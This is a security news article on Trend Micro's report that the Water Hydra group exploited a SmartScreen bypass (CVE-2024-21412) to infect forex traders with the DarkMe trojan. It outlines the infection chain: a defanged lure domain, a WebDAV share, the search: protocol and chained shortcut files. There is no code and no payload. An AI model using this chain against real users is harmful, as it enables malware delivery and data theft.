DarkMe Malware Exploits Zero-Day Vulnerability in Microsoft SmartScreen , Targeting Financial Traders

In an alarming discovery, Trend Micro’s cybersecurity researchers have disclosed that an advanced persistent threat actor called Water Hydra or DarkCasino has exploited a security flaw in Microsoft Defender SmartScreen as a zero-day vulnerability.

The researchers have been tracking this malicious campaign since late December 2023, and this involves the exploitation of CVE-2024-21412, a security bypass vulnerability associated with Internet Shortcut Files (.URL)

In a report on Tuesday, the cybersecurity firm said:

In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass Microsoft Defender SmartScreen and infect victims with the DarkMe malware.

Microsoft has fixed the vulnerability in its February Patch Tuesday update and warned that an unsubstantiated attacker could take advantage of the flaw by sending a carefully crafted file to the targeted person, thereby circumventing the displayed security checks.

However, the attack will only be successful if the victim clicks the file link and views the content controlled by the attacker.

The infection process, as Trend Micro describes, involves the exploitation of CVE-2024-21412 to drop a malicious installer file 7z.msi.

This happens if the victim clicks on the malicious link (fxbulls[.]ru), which is distributed through Forex Trading forums.

The URL is disguised as a link to a stock chart image, but it actually takes you to an internet shortcut file (photo_2023-12-29.jpg.url)

According to security researchers, Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun:

The landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered crafted view. When users click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security prompt, so the user might not think that this link is malicious.

The threat actor takes advantage of the search: application protocol, which is used to call the desktop search application on Windows and is infamous for being abused in the past to deliver malware.

This deceptive internet shortcut file points to another hosted on a remover 2.url, which directs to a Command Prompt shell script within a ZIP archive, a2.zip/a2.cmd.

The complexity of this referencing strategy serves to avoid SmartScreen, as it fails to properly apply the Mark of the Web, a vital Windows component that warns you when you open files from untrusted sources.

The final objective of the campaign is to

The final objective of the campaign is to cautiously deliver the Visual Basic trojan called DarkMe while keeping up the facade of displaying a stick graph to the affected user throughout the exploitation and infection chain.

DarkMe can download and execute extra instructions, connect with a command-and-control (C2) server, and collect information from the compromised device.

The discovery of this zero-day exploit has raised concerns about the advancement of hacker tactics.

The researchers at Trend Micro also mentioned:

Water Hydra possess the technical knowledge and tools to discover and exploit zero-day vulnerabilities in advanced campaigns, deploying highly destructive malware such as DarkMe.

As the cybersecurity community deals with these emerging threats, it is better to stay vigilant and make sure you install all security updates to keep your devices protected against ever-evolving cyber threats.

What steps do you take to avoid these attacks? Share the tips & tricks you follow to stay away from these threats in the comments section below.